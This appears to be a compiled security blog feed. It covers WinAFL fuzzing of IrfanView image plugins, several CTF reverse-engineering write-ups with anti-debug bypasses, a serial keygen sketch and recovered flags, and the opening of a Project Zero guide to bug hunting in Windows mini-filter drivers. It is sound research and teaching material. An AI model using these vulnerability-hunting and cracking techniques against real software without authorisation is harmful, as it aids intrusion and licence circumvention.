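  -target_offset 0x1000 -fuzz_iterations 5000 -nargs 2 -- harness.exe @@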


Looking at WinAFL's interface, the parameters to watch are:

- exec speed: the number of test cases executed per second.
- stability: how stable the run is. WinAFL iterates a set number of times on each test case, and in theory repeated iterations on the same test case must produce the same coverage; if that value changes, stability drops.
- map density: the coverage of the target when running the current test case.


All three of these must be high for fuzzing to be effective [4].


Irfanview treats other image file formats the same way as jpeg2000; the plugins responsible for parsing image files expose similar processing functions. Besides jpeg2000 I also tried other formats such as gif, dicom, djvu, ani, dpx, wbmp, and webp.


Results: CVE-2019-17241, CVE-2019-17242, CVE-2019-17243, CVE-2019-17244, CVE-2019-17245, CVE-2019-17246, CVE-2019-17247, CVE-2019-17248, CVE-2019-17249, CVE-2019-17250, CVE-2019-17251, CVE-2019-17252, CVE-2019-17253, CVE-2019-17254, CVE-2019-17255, CVE-2019-17256, CVE-2019-17257, CVE-2019-17258, CVE-2019-17259, CVE-2019-17261, CVE-2019-17262


Tips and Tricks


While using WinAFL, I found it most stable on Windows 7. On Windows 10 it behaves very badly; DynamoRIO has some memory problems on Windows 10 that lead to fuzzer crashes.


When fuzzing, I recommend turning on Page Heap for the harness to better detect out-of-bounds and uninitialized-memory bugs.
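Page Heap can be enabled with the gflags utility from the Debugging Tools for Windows, for example (harness.exe being your harness binary):

gflags.exe /p /enable harness.exe /full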


Afl-tmin is a useful tool for minimizing the corpus, which helps the fuzzer a lot during mutation. However, I usually skip it because it is too slow; I think I will try the halfempty tool [8] as a replacement in the future.


Speeding things up: the fewer Windows API calls the harness makes, the faster DynamoRIO's instrumentation runs. In the harness I wrote above, I call LoadLibraryA in main to load the DLL I need to fuzz, and my target_offset points at main, which slows the fuzzer down considerably.


There are many workarounds. Among the ones I have read about [9], changing the offset where instrumentation starts is quite neat, but when I checked it running in debug mode with the iterator my fuzzer was unstable, and I don't know why. Instead, I used LIEF [10] to solve the problem: I load the library I need to fuzz before main executes:
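(The original post showed the LIEF patch as a screenshot.) The idea is to have the Windows loader map the target DLL before main so that no LoadLibrary call runs inside the instrumented loop. A different way to get the same load-before-main effect, shown here only as an alternative and not the author's method, is a global constructor in the harness:

#include <windows.h>

// Alternative to patching the import table with LIEF: a global object
// whose constructor runs during CRT startup, before main(), so the DLL
// is already mapped when fuzzing begins.
namespace {
struct PreMainLoader {
    PreMainLoader() { LoadLibraryA("JPEG2000.dll"); }
};
PreMainLoader g_loader;  // dynamic initialization happens before main()
}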


                
And this is the result after fixing the fuzz target my way:

                

Speed improved, but this is not the best approach, because speed also depends on the target you fuzz, not only on the harness you build. I use it because there is another fuzzer on Windows that I later came to prefer over WinAFL, and loading the library before main fits that fuzzer's architecture. I will say more about that fuzzer in later articles.


Corpus: many fuzzing newcomers assume that building the harness is the most important and hardest part. For me, finding a corpus is the thorniest problem. Corpora with high coverage are very rare, and people usually will not share them because they are so valuable for fuzzing.


When you gather a large corpus, use winafl-cmin to reduce the number of test cases; some test cases' coverage will be duplicated by, or subsumed within, others.


Conclusion


This was the first target I used to learn fuzzing. When my bugs were submitted and received CVEs, some people said I was farming low-value CVEs. I don't argue with them; I only care about what I do and what I learn from it. Continuing this series on fuzzing, I will share how I approached and fuzzed out bugs in VMWare, Microsoft, and others, based on what I covered in this article.


[3] https://www.xnview.com/en/

[4] https://www.apriorit.com/dev-blog/644-reverse-vulnerabilities-software-no-code-dynamic-fuzzing

[5] https://symeonp.github.io/2017/09/17/fuzzing-winafl.html

[6] https://github.com/DynamoRIO/dynamorio

[7] https://github.com/gaasedelen/lighthouse

[8] https://github.com/googleprojectzero/halfempty

[9] https://github.com/googleprojectzero/winafl/issues/4

[10] https://github.com/lief-project/LIEF





RedVelvet - 75 pts

By: linhlhq
6 February 2018 at 09:06
Nothing special about this one: you enter the flag and it checks each character:


The functions fun1 through fun15 check the characters of the flag. The anti-debugging is blatant, so bypassing it is easy.
After passing all of those functions there is more than one candidate flag — well, only a few — so you can happily brute-force submit them all without issue. Otherwise, a little further on there is a SHA256 hash check you could use to pick the right one. Me, I just submitted them =)).

My solution code is rather crude :( — since there was a hash check I feared there would be multiple answers, and with z3 I feared having to hunt for more solutions later.

easy_serial - 350pts

By: linhlhq
6 February 2018 at 09:04
This challenge is, in my opinion, not an elegant one; or perhaps the author's intent was to force us to use a decompiler tool.
I enthusiastically loaded it into IDA and ran it, and immediately hit the virtual alarm trick. Reading the code to bypass that trick properly looks fairly messy (leaving aside similar tricks, if it merely called alarm it would be trivial). While reading the code for its main function I noticed a rather odd name, "Main_main_infor", and googling revealed the binary was written in Haskell; checking again, GHC was right there.


Continuing to google for a decompiler, I found a tool (link here), which is quite easy to use. I also found a link where someone decompiles such output manually, worth a look for their approach. After decompiling it emits a pile like this, probably symbolic opcodes, since the Haskell structures I looked up are nothing like this pile.

Copying it over to Notepad and reading through, I spotted some familiar bits of text, so this was workable =)).

At this point the challenge stops being interesting, since it quite plainly compares those characters. And here is my script for this challenge.

Boom - 223pts

By: linhlhq
6 February 2018 at 08:59
This challenge was also built in an unusual multi-platform way. If you are not used to this kind of debugging and step into every function, it will eat a lot of time.
The organizers made this challenge far too long; a VM challenge I have worked on was only about this long.
The program has a great many branches, and the inputs likewise. I had only finished half of it when I stopped, because when I checked the server it had already been shut down. A shame; I don't know if it will come back up.

Because it is so long I almost didn't write this post; I really didn't want to go into detail. Here I will only outline the parts I already solved.
A quick word on what the program does: it asks you to enter a string and checks it; if correct, it reads a file from /tmp/files/?, and keeps going deeper. The more correct inputs you provide, the more files it reads; they are numbered 1 through 13. Since I haven't finished all the branches and the server is down, I can't be sure what those files contain. They may hold the characters of the FLAG.

1. First, on startup, the program asks you to enter a string.

The input string has three cases:
If you enter "Know what? It's a new day~" you go to branch 1 (the names are just mine, to make this easier to write)
If you enter "It's cold outside.." you go to branch 2 -> opens /tmp/files/2
If you enter "We need little break!" you go to branch 3 -> opens /tmp/files/3
I took branch 1 => it opens and reads /tmp/files/1

2. Next the program reads in 7 numbers. These 7 numbers are converted into a character string and compared; if correct, it goes on to read one more file. The odd part is that there are three strings it compares against:

key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4
key2 = "w33kend" => [49 15 15 31 1 23 13] => /tmp/files/5
key3 = "pand0ra" => [57 14 23 13 50 7 14] => /tmp/files/6

All three sequences are accepted, but each one opens a different file. Thoroughly confusing.

3. The program then asks for one number and checks it through main::fun12:

if (main::fun12(0, number) == 0x6b) => true

Plenty of numbers satisfy that condition. After a correct input it goes on to open /tmp/files/13.

4. It then asks for 4 more numbers. At this point I read the code and could not work out what they were for, which was discouraging. But as it turns out, whatever goes wrong, this program prints it all out for you.

I tried a few more inputs and realized the numbers only range from 1 to 9. So why not brute force? I brute-forced some satisfying solutions, e.g. 1 3 5 8, and on a correct input it opens /tmp/files/8.

5. Next comes a string that is transformed and compared against "H_vocGfsg4p_xicwcrwexg4r". The transformation algorithm is in my solution code. On a correct input it opens /tmp/files/11.
After finishing this string I realized the program loops back to the 7-number prompt, so I went on to enter the remaining cases above:
- With key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4, it just cycles back and forth through the steps above.
- Only with key3 = "pand0ra" => [57 14 23 13 50 7 14] => /tmp/files/6 does it then ask for 27 numbers and check them, opening one more file, /tmp/files/10.
I checked very carefully at this point but found no exit condition; it just loops between entering numbers and entering strings.
If those files contain the characters of the flag, I would presumably run it three times to collect them all.
That is as far as I got; if the server comes back up I will finish the rest. My code solving these parts is here.

A quick review of the Codegate reversing challenges

By: linhlhq
6 February 2018 at 08:51
1. RedVelvet – 75 pts
    A simple one that just checks the flag's characters.
2. Welcome to droid - 125pts
    I solved this one clumsily: the official write-up patches the entry point, while I went off reading Dalvik opcodes and patched the random function. Pretty silly, so I didn't write it up.
3. Boom - 223pts
    I was nearly done when I noticed the server had been shut down, so I stopped. Basically it is very long and awkwardly built on top of that.
4. easy_serial - 350pts
    Another awkward one in the same vein as Boom, except a decompiler tool exists for it.
5. 6051 - 880pts
    The best challenge I managed to solve in this set; heavily algorithmic.
6. CPU - 971pts
    Probably some kind of VM; at a glance the code resembles the challenge from mates-round1, which also had you enter opcodes to execute. It needs a server connection too, and since the server is down I haven't touched it. Excuses aside, even with it up I would probably have a hard time cracking it.

Serialme

By: linhlhq
26 December 2017 at 15:32
This is a VM-engine style challenge. I have read many write-ups by pros on this kind of thing and understood none of them; they all solve it the civilized way.
I hope I will understand this properly someday; for now I solved this challenge thanks to this.
I read up a bit on how a vm_engine works: the mechanism centers on the "vm_loop" loop.
A quick word on this challenge: it asks you to enter 10 numbers in sequence, and once all 10 are correct the flag pops out. That sounds simple, but the vm_engine made checking those numbers thoroughly confusing for me.
Concretely, the vm loop in this challenge looks roughly like this:

This loop has 20 cases, and each case basically performs a single operation such as add, xor, mov, and so on, so I just traced through it by brute force (a generic sketch follows).
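A generic dispatch loop of that shape, with illustrative opcodes rather than the challenge's real ones, looks something like this:

#include <cstdint>
#include <cstddef>

// Generic sketch of the dispatch loop described above; the opcode
// numbering and handlers are illustrative, not the challenge's real ones.
struct VM {
    uint32_t regs[8] = {0};
    const uint8_t *code = nullptr;
    size_t pc = 0;
    bool running = true;
};

void vm_loop(VM &vm) {
    while (vm.running) {
        uint8_t op = vm.code[vm.pc++];
        switch (op) {
        case 1: {   // add reg, reg
            uint8_t d = vm.code[vm.pc++], s = vm.code[vm.pc++];
            vm.regs[d] += vm.regs[s];
            break;
        }
        case 2: {   // xor reg, reg
            uint8_t d = vm.code[vm.pc++], s = vm.code[vm.pc++];
            vm.regs[d] ^= vm.regs[s];
            break;
        }
        case 8:     // compare: the case to watch in this challenge
            break;
        case 12:    // read a number from input into a register
            break;
        default:
            vm.running = false;
            break;
        }
    }
}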

case 12 is where the input number is read and handled. After all that code processes the input, the value ends up stored in eax. Digging deep into it is actually quite messy, because the author switched the input to file-based input, so the number comes in as a string and gets converted back and forth before the value lands in eax.
Each number then passes through the cases to perform its computations, and at the end of each round the loop stops at case 8 for a comparison. You must satisfy the condition there before you can enter the next number.

From there it is easy to grind out the flag.

Debugme

By: linhlhq
26 December 2017 at 14:57
I will explain this one briefly. When you enter the flag, it is encrypted (AES-256) and then XORed with a string. That is all of it.
As for the individual conditions: the flag length is 9.

The program then creates a thread which runs 16 encryption loops. But this is a troll: the 16 rounds are identical and independent, not chained, so in the end the thread just AES-encrypts the flag once.

- Here is the AES encryption source code. This thread fooled me and cost me quite a bit of time. As I said above, it really encrypts the flag once, not 16 times. But when I checked the result of my input after it ran through this thread, the value differed from a single encryption, which left me going back and forth.
- After a while I noticed the WaitForMultipleObjectsEx call right below the thread. I set a breakpoint before that Sleep call, because I had found that the value changes after running through Sleep.
- To catch that moment, I set a hardware breakpoint on the address storing the string's result (byte_1D4CA0) and let it run normally, so the program would stop right where the function that modifies the encrypted value executes.
- And here is the function that changes the ciphertext: it simply XORs it with the value at xmmword_1A9EF0.
- That is it: the XORed ciphertext is then compared against the value here.
- I did all the ciphertext/plaintext verification steps on this site: http://aes.online-domain-tools.com/

Unlockme

By: linhlhq
26 December 2017 at 14:51
This is a serial-style challenge: you enter a name and a key, and once the transformed name and key match under the challenge's algorithm, the flag is yours.
The code is quite long and tangled. The algorithm in short:
- For the name, each character entered is transformed according to the following pseudocode:

After the transformation, the value of the base variable is used to check the key you entered.
- The key format is xx-xx-xx-xx => length = 11. If you look closely there is a check on the key's length:

Next, the xx values are converted directly into numbers; for example 12-13-3f-4a becomes the four numbers 12, 13, 3f, 4a.
These numbers are added to the characters of base above, in reverse order, under the constraint:
base[0] + number 4 == base[1] + number 3 == base[2] + number 2 == base[3] + number 1
(the ordering is just my way of describing it; the author's source may be more civilized — a small keygen sketch follows below)
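Given that constraint, a keygen is easy: pick any common target sum T and derive the four key bytes from base. A small sketch (my reconstruction of the check, not the challenge's exact code; the base values here are made up, the real ones come from the name transformation above):

#include <cstdio>
#include <cstdint>
#include <algorithm>

int main() {
    uint8_t base[4] = { 0x10, 0x22, 0x05, 0x31 };        // from the name
    unsigned T = *std::max_element(base, base + 4) + 1;  // any T >= max works
    // base[0]+n4 == base[1]+n3 == base[2]+n2 == base[3]+n1 == T
    unsigned n4 = T - base[0], n3 = T - base[1];
    unsigned n2 = T - base[2], n1 = T - base[3];
    printf("%02x-%02x-%02x-%02x\n", n1, n2, n3, n4);     // xx-xx-xx-xx, length 11
    return 0;
}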
When I got this far I thought I was done; who knew the organizers would troll us with a fake flag. I submitted wrong answers repeatedly.

The author also anti-debugs the code path that prints the flag and, I believe, requires the name to be longer than one character; I just edited a register to bypass that.
WhiteHat{2f2a1ebcc9f4b69502343e04bc2ae7e185e4c01a}

Writeup Pyc

By: linhlhq
26 December 2017 at 14:47
After extracting the archive I got connect.pyc. Just use a decompiler tool to recover the source; here it is.

This is a code-execution mechanism that Python supports: that blob of data is a binary form built from source, and it can be executed through marshal.loads as above.
I googled around to learn about this, and everything pointed to Python's disassembler for rendering that source into an asm-like form I could understand.
Seeing that, I figured it would be easy, just disassemble it and read, but it was not simple at all.

It took me a while to understand the structure of the stuff in the picture. Afterwards I rewrote the logic I had just disassembled to make it easier to follow. Link to my reimplementation.

The flag-checking behaviour, once I rewrote it in Python, is nothing special. The flag is split into 6 groups of 4 characters, one per line, stored in a file named flag.txt; the program reads the flag from the file and verifies it.
There are three main check functions, "xor", "check_flag" and "check_str", and the contents of flag.txt are run through them.
The difficulty of this challenge is not the get-flag step; the organizers' point was presumably the pile of Python bytecode above that you have to disassemble and understand.
I wrote a script to invert the checks and recover the flag groups, again by brute force.
My script yields more than one flag, since I only used two of the check conditions, but once it runs it is immediately obvious which one is correct.
{Ch4ll3ngE_V3ry_FUN_R1gHt}

Writeup re250 (Picaso)

By: linhlhq
14 December 2017 at 14:00
Loay hoay làm bài da-vinci (re150) 1 hồi mãi không hiểu ý của tác giả là gì mặc dù thuật toán bài đó rất rõ ràng.
Quay sang bài picaso(re250) :v không phải chọn nó vì tên mà xem số người làm được thôi.
Ban đầu nhìn dung lượng file này thấy ngờ ngợ (~10mb). Load lên ida mới giật mình thấy toàn là lệnh mov :v. Và đây là dạng mình làm rồi (đề thi chọn đội tuyển của UET).
Đây là 1 dạng obfuscate code với lệnh mov, cái này mà để nguyên debug thì chỉ có sấp mặt
  • Nếu cứ cố chấp trace thì có lẽ sẽ nhìn thấy cái chữ màu vàng trên hình kia khá khá khá nhiều lần :v.
  • Đối với dạng này đầu tiên cần phải deobfuscate được code. Cái này thì mình không biết nhưng thằng khác nó lại biết, còn viết cả code mình chỉ lấy tool nó viết về xài thôi
  • Sau khi demovobfuscate được thì code nhìn cũng không có gì khác biệt vẫn rất nhiều lệnh mov nhưng quan trọng ở chỗ là code bây giờ đã xuất hiện các lệnh JMP trước đó bị làm rối.
  • Đến đây thì giải bài này dễ hơn nhiều rồi, vì là đã làm rối code nên cái check flag của bài này rất đơn giản.
  • Cách mình lật ngược cái đoạn code check flag như thế này:
    • Mình tìm đoạn text in ra flag -> đặt nhãn mới cho đoạn code này
    • Tìm tiếp cái đoạn “No! Try another key!” kìa -> đặt tiếp cái nhãn đến đó
    • Và bắt đầu lật ngược code từ chỗ in flag lên Có đến 9 lệnh JMP đến cái nhãn No_flag => đoán sơ sơ ban đầu chắc 1 lần check leng, 8 lần check flag.
    • Nếu lật ngược lên từ đoạn code in flag thì có thể nhận ra dễ dàng là nó sẽ kiểm tra flag sau đó nếu thỏa mãn nó sẽ nhảy sang đoạn code check flag tiếp nếu k nó sẽ Jmp No_flag
    • Cứ như vậy cho đến đầu code (làm thế này rất nhanh mà không phải mò mẫm khi cứ thế trâu bò debug luôn) thì thấy đoạn check leng của flag:
  • Khi xong xuôi thì có thể debug luôn :v. tìm flag nhưng code vẫn còn rối với nhiều mov lắm, trace ra cờ chắc cũng mất thời gian. Nhưng trong lúc mình truy ngược lên mình có để ý ở trong các hàm check flag là code trong đó phần lớn là giống nhau, giống đoạn đầu code (đoạn jmp đến) cũng như đoạn cuối code (đoạn jmp đi) cấu trúc là như nhau vậy thì giữa code :v…
mov R3, edx
mov R2, value
mov eax, R3
mov edx, R2
    • This little snippet is the key to the challenge: the value changes on each JMP, and I picked out all of those values here:
    • [8,0x71,0x69,0x65,0x65,0x76,0x74,0x69,0x74] => [qieevtit]
  • That 8 is probably the length of the flag.
  • Entering it directly shows it's not the flag; the character positions have been shuffled. One look and I immediately thought of brute force, since I dreaded debugging that pile of code. Around this time I was learning tools like z3 and angr (I'm hopeless with them; the challenges they could solve, I usually end up scratching out in Notepad++ instead).
  • To puzzle out the rest of the flag I used a Pin tool, something I'd read about long ago on my mentor's blog and found really neat. The tool simply counts the number of instructions executed during a run. So I try the positions of those characters: if the instruction count increases between attempts, the position is right; if not, it's wrong :v. Here is the solver I wrote in Python; it runs fine but is slow, and I don't know how to speed it up.
  • The one thing that still puzzles me is this challenge's length check. Using the tool to probe the flag length, strangely, for flags of 7 characters or fewer the instruction count rises steadily, but from 8 characters on the count drops slightly below the count at length 7 and never changes again => I'm still fuzzy about this length check. If that's the behavior, the author's length check may simply test >= 8, or it's something else I can't see.
And here is the result of recovering the flag with the Pin tool:

=)) tieqviet
Now take the flag and go submit it:

Hunting for Bugs in Windows Mini-Filter Drivers

By: Ryan
14 January 2021 at 17:04

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

 The purpose of a file system filter driver according to Microsoft is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.

With the issues now fixed I thought it would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I’ll also provide some basic example code to give you an idea of common coding patterns. The goal is to allow you to do your own research in this area.

I’m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. Also I’m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call, the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

These are the basics of how a filter driver works: the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations above to filter requests. If it wants to inspect or modify the response it can register a completion routine and handle the operation in the callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP which means it’ll not be processed by any other driver down the stack. If the driver passes on the IRP the driver must register a completion routine otherwise it’ll not be notified when the IRP has been processed by the lower drivers in the stack.

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making an IO request. When handling responses the altitudes are processed in reverse order, so the filter at 5000 will be called first then the one at 10000. Officially the altitude values must be registered with Microsoft. MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude except it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
bindflt                                 1       409800         0
WdFilter                               17       328010         0
storqosflt                              1       244000         0
wcifs                                   0       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                    14        40700         0
FileInfo                               17        40500         0

We can see all the mini-filters registered, the number of instances (which indicates how many volumes each filter is attached to) and the altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can decide which volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.
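
As a minimal sketch (the attachment policy here is purely hypothetical), an instance setup callback which only accepts NTFS disk volumes might look like this:

NTSTATUS InstanceSetupCallback(
    PCFLT_RELATED_OBJECTS FltObjects,
    FLT_INSTANCE_SETUP_FLAGS Flags,
    DEVICE_TYPE VolumeDeviceType,
    FLT_FILESYSTEM_TYPE VolumeFilesystemType
) {
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(Flags);
    // Attach only to NTFS disk volumes; decline everything else.
    if (VolumeDeviceType == FILE_DEVICE_DISK_FILE_SYSTEM &&
        VolumeFilesystemType == FLT_FSTYPE_NTFS) {
        return STATUS_SUCCESS;
    }
    return STATUS_FLT_DO_NOT_ATTACH;
}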

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus
------------- ------------  ----------------------  -----  --------
C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive, it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands; we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.
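
To tie the registration pieces together, the following is a minimal sketch of a driver entry point registering with the filter manager. The FLT_REGISTRATION field values here are illustrative; Callbacks is an operation registration array like the one shown in the next section, and InstanceSetupCallback is the attachment callback sketched above.

#include <fltKernel.h>

PFLT_FILTER g_Filter;

NTSTATUS FilterUnload(FLT_FILTER_UNLOAD_FLAGS Flags) {
    UNREFERENCED_PARAMETER(Flags);
    FltUnregisterFilter(g_Filter);
    return STATUS_SUCCESS;
}

const FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION),      // Size
    FLT_REGISTRATION_VERSION,      // Version
    0,                             // Flags
    NULL,                          // ContextRegistration
    Callbacks,                     // OperationRegistration
    FilterUnload,                  // FilterUnloadCallback
    InstanceSetupCallback,         // InstanceSetupCallback
    // Remaining callback fields default to NULL.
};

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    NTSTATUS status = FltRegisterFilter(DriverObject,
                                        &FilterRegistration, &g_Filter);
    if (!NT_SUCCESS(status))
        return status;
    // Start receiving callbacks for the registered operations.
    status = FltStartFiltering(g_Filter);
    if (!NT_SUCCESS(status))
        FltUnregisterFilter(g_Filter);
    return status;
}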

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver only needs to specify the callbacks it actually requires. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.

const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_CREATE,
      0,
      PreCreateOperation,
      PostCreateOperation },
    { IRP_MJ_OPERATION_END }
};

A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:

typedef FLT_PREOP_CALLBACK_STATUS
(*PFLT_PRE_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID *CompletionContext
    );

The parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure’s Iopb field which is an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:

Name                             Value  Description
FLT_PREOP_SUCCESS_WITH_CALLBACK  0      The callback was successful. Pass on the IO request and get a post-operation callback after completion.
FLT_PREOP_SUCCESS_NO_CALLBACK    1      The callback was successful. Pass on the IO request. No callback required.
FLT_PREOP_PENDING                2      Mark the IO operation as pending.
FLT_PREOP_DISALLOW_FASTIO        3      If handling a Fast IO operation, fail it to force the operation as a normal IO Request.
FLT_PREOP_COMPLETE               4      The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack.
FLT_PREOP_SYNCHRONIZE            5      Synchronize the post-operation callback in the same thread.
FLT_PREOP_DISALLOW_FSFILTER_IO   6      Disallow FastIO file creation.

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:

typedef FLT_POSTOP_CALLBACK_STATUS
(*PFLT_POST_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID CompletionContext,
    FLT_POST_OPERATION_FLAGS Flags
);

The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.

Name                                 Value  Description
FLT_POSTOP_FINISHED_PROCESSING       0      The callback was successful. No further processing required.
FLT_POSTOP_MORE_PROCESSING_REQUIRED  1      Halts completion of the IO request. The operation will be pending until the filter driver completes it.
FLT_POSTOP_DISALLOW_FSFILTER_IO      2      Disallow FastIO file creation.

Handling IO Requests

Now that we’ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. The examples demonstrate the likely code you’ll find in a driver but omit security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn’t contain that access then the request is passed on with no post-operation callback.

FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;
    DWORD access = ps->Create.SecurityContext->DesiredAccess;
    if ((access & FILE_WRITE_DATA) == 0) {
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }
    // Perform some operation...
